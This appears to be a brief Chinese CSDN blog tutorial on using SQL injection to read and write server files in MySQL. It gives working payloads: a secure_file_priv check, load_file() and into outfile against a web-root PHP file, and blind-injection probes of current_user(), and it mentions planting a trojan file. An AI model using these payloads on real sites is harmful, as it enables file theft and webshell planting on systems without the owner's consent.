SQL注入读写文件

本文探讨了SQL注入中实现文件读写的关键条件,包括数据库的导入导出权限和用户文件操作权限。通过`load_file()`和`into outfile`函数进行文件操作,并通过盲注技术探测当前用户权限。举例展示了如何查询当前用户、验证文件权限,以及利用SQL注入植入木马文件。
摘要由CSDN通过智能技术生成

SQL注入读写文件的根本条件:

1. 数据库允许导入导出(secure_file_priv)

2. 当前用户用户文件操作权限(File_priv)

 

(select 1,2,%40%40global.secure_file_priv%23) %40为@

load_file()读文件 into outfile / into dumpfile写文件 条件:

1.对web目录具有读写权限

2. 知道文件绝对路径

3. 能够使用联合查询(sql注入时)

命令: select load_file('d:/phpstudy/www/anyun.php');

select 'anyun' into outfile 'd:/phpstudy/www/anyun.php';

 

 

(例)盲注:
查询当前用户:
id输入:1')) and length(current_user())>10%23
id输入:1')) and length(current_user())=14%23  正确

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值